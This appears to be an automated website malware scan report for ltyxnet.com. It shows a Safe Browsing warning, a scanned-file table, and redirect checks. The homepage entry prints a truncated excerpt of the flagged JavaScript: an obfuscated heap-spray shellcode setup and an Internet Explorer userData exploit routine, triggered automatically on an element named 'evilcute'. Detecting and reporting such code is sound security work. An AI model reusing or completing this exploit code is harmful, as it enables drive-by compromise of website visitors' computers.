Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ltyxnet.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ltyxnet.com/ | 200 OK Content-Length: 72930 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var CutePower = anheywangma(AnHey.replace (/CUTEQQ/g,'%u')); var CuteMoney = new Array() var CuteShine = 0x86000 - CutePower.length*2; var sss = Array(472,388,456,128,268,468,464,404,332,420,488,404,128,244,128,136,268,340,336,276,324,324,192,396,192,136,172,136,396,268,340,336,276,324,324,192,396,192,136,172,136,396,136,236,472,388,456,128,268,468,464,404,328,420,412,416,464,128,244,128,388,440,416,404,484,476,388,440,412,436, } } function ahwm() { var CuteLock = document.createElement("BODY"); CuteLock.addBehavior("#default#userData"); document.appendChild(CuteLock); try { for (i=0;i<10;i++) { CuteLock.setAttribute('s',window); } } catch(e) {} window.status+=''; } document.getElementById("evilcute").onclick(); Antivirus reports:
| ||
http://ltyxnet.com/pack.js | HTTP/1.1 200 OK Date: Fri, 26 Dec 2014 16:25:08 GMT Accept-Ranges: bytes ETag: "6a4b29739175cd1:a7f69" Server: Apache/2.2.22 (Ubuntu) Content-Length: 178 Content-Location: http://ltyxnet.com/pack.js Content-Type: application/x-javascript Last-Modified: Wed, 08 Aug 2012 18:13:02 GMT X-Powered-By: WAF/2.0 | clean |
http://ltyxnet.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://ltyxnet.com/pack.css | HTTP/1.1 200 OK Date: Fri, 26 Dec 2014 16:25:10 GMT Accept-Ranges: bytes ETag: "afe5a4e9175cd1:a7f69" Server: Apache/2.2.22 (Ubuntu) Content-Length: 4910 Content-Location: http://ltyxnet.com/pack.css Content-Type: text/css Last-Modified: Wed, 08 Aug 2012 18:12:00 GMT X-Powered-By: WAF/2.0 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ltyxnet.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 26 Dec 2014 16:25:03 GMT
Server: Apache/2.2.22 (Ubuntu)
Content-Length: 72930
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQBQCQBB=KONNJPKCDADCGNNNAJEBNMDK; path=/
X-Powered-By: WAF/2.0
...72930 bytes of data.
GET / HTTP/1.1
Host: ltyxnet.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 26 Dec 2014 16:25:03 GMT
Server: Apache/2.2.22 (Ubuntu)
Content-Length: 72930
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQBQCQBB=KONNJPKCDADCGNNNAJEBNMDK; path=/
X-Powered-By: WAF/2.0
...72930 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ltyxnet.com
Referer: http://www.google.com/search?q=ltyxnet.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ltyxnet.com
Referer: http://www.google.com/search?q=ltyxnet.com
Result:
The result is similar to the first query. There are no suspicious redirects found.